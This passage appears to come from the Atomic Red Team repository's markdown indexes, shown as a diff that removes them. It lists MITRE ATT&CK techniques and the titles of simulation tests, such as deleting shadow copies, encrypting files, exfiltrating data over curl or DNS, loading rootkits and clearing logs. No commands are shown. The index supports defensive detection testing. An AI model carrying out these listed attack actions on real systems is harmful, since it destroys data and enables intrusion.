- T1608.005 Link Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.003 Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.002 Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.004 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585 Establish Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1650 Acquire Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.007 Serverless [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.006 SEO Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.005 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# reconnaissance
- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.002 DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.002 WHOIS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1592.001 Gather Victim Host Information: Hardware](../../T1592.001/T1592.001.md)
- Atomic Test #1: Enumerate PlugNPlay Camera [windows]
- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.004 Network Topology [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595 Active Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.002 Search Engines [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.003 Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.003 Employee Names [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.004 CDNs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.003 Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.002 Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.001 Social Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.001 Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.003 Wordlist Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598 Phishing for Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- Atomic Test #4: Change User Password via passwd [macos, linux]
- Atomic Test #5: Delete User via dscl utility [macos]
- Atomic Test #6: Delete User via sysadminctl utility [macos]
- Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell [azure-ad]
- Atomic Test #8: Azure AD - Delete user via Azure CLI [azure-ad]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- Atomic Test #5: PureLocker Ransom Note [windows]
- Atomic Test #6: Encrypt files using 7z utility - macOS [macos]
- Atomic Test #7: Encrypt files using openssl utility - macOS [macos]
- Atomic Test #8: Data Encrypted with GPG4Win [windows]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via `halt` - Linux [linux]
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
- Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1566.001 Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Macro-Enabled Phishing Attachment [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #3: Enable Guest Account on macOS [macos]
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
- Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #3: DNSExfiltration (doh) [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- Atomic Test #6: MAZE FTP Upload [windows]
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
- Atomic Test #8: Python3 http.server [linux]
atomics/Indexes/Indexes-Markdown/linux-index.md
-786
View File
@@ -1,786 +0,0 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
- Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #13: Delete system journal logs via rm and journalctl utilities [linux]
- Atomic Test #14: Overwrite Linux Mail Spool [linux]
- Atomic Test #15: Overwrite Linux Log [linux]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #8: XOR decoding and command execution using Python [linux, macos]
- [T1562 Impair Defenses](../../T1562/T1562.md)
- Atomic Test #2: Disable journal logging via systemctl utility [linux]
- Atomic Test #3: Disable journal logging via sed utility [linux]
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
- Atomic Test #2: Copy and Delete Mailbox Data on Linux [linux]
- Atomic Test #5: Copy and Modify Mailbox Data on Linux [linux]
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #9: Turn off UFW logging [linux]
- Atomic Test #10: Add and delete UFW firewall rules [linux]
- Atomic Test #11: Edit UFW firewall user.rules file [linux]
- Atomic Test #12: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #13: Edit UFW firewall sysctl.conf file [linux]
- Atomic Test #14: Edit UFW firewall main configuration file [linux]
- Atomic Test #15: Tail the UFW firewall log file [linux]
- Atomic Test #16: Disable iptables [linux]
- Atomic Test #17: Modify/delete iptables firewall rules [linux]
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
